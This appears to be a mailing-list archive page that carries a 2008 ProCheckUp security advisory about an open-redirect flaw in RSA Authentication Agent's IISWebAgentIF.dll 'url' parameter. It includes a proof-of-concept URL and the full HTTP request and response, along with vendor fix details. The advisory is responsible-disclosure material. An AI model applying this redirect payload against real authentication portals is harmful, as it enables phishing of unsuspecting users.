Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PR07-43: Cross-domain redirect on RSA Authentication Agent

from [ProCheckUp Research] Network Security [Permanent Link]
Subject: PR07-43: Cross-domain redirect on RSA Authentication Agent
Date: Wed, 23 Apr 2008 17:58:53 +0100 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR07-43: Cross-domain redirect on RSA Authentication Agent

Vulnerability found: 5th December 2007

Vendor informed: 13th December 2007

Severity: Medium-low

Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services in conjunction with Mozilla Firefox 2.0.0.11


Description:

A remote URI redirection vulnerability affects the RSA Authentication
Agent. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'url' parameter.

An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a RSA Authentication Agent specially-crafted URL is visited.

Although the 'url' parameter is filtered for protocol URLs such as
'http://' and 'https://', is NOT filtered for other protocols such as
FTP or Gopher. An attacker could upload a spoof login page to a FTP
server that allows anonymous connections where the victim would be
redirected.

Vulnerable server-side script: '/WebID/IISWebAgentIF.dll'

Unfiltered parameter: 'url'

Note: the redirect will only take place in browsers which consider URLs
with only one slash after the colon symbol ':' as valid when performing
redirects - i.e.: "Location: ftp:/evil-domain.foo/"


Proof of concept:

Example of specially-crafted URL:

https://target-domain.foo/WebID/IISWebAgentIF.dll?Redirect?url=ftp://bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm



COMPLETE HTTP REQUEST:

GET
/WebID/IISWebAgentIF.dll?Redirect?url=ftp://bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm
HTTP/1.1
Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11)
Gecko/20071127 Firefox/2.0.0.11
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive


COMPLETE HTTP RESPONSE:

HTTP/1.x 302 Object Moved
Connection: Keep-Alive
Content-Length: 194
Date: Tue, 18 Dec 2007 09:35:19 GMT
Location:
ftp:/bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET



Consequences:

Victim users can be redirected to third-party sites for the purpose of
exploiting browser vulnerabilities or performing phishing attacks.


Fix:

The vendor has stated that this issue was addressed in the RSA
Authentication Agent 5.3.3.378. RSA customers can download the upgrade
from the RSA web site.


References:

http://www.procheckup.com/Vulnerabilities.php
http://www.rsa.com/node.aspx?id=2807


Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com).
ProCheckUp thanks RSA for being so cooperative and responding so fast.


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community  for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited  or changed in any way, is
attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse  of this information by any third party.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFID2rNoR/Hvsj3i8sRAukFAJ97A3DxU4O0g9iKR/vKZ46rnU9ojgCeJM0E
yDMzUlHmABD2Vdvf79/ZRXE=
=chQJ
-----END PGP SIGNATURE-----

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • PR07-43: Cross-domain redirect on RSA Authentication Agent, ProCheckUp Research <=
Previous by Date:  Re: NetClassifieds Sql Injection, laurent . gaffie
Next by Date:  PR07-44: XSS on RSA Authentication Agent login page, ProCheckUp Research
Previous by Thread:  [SECURITY] [DSA 1555-1] New iceweasel packages fix arbitrary code execution, Moritz Muehlenhoff
Next by Thread:  PR07-44: XSS on RSA Authentication Agent login page, ProCheckUp Research
Indexes:  [Date] [Thread] [Top] [All Lists]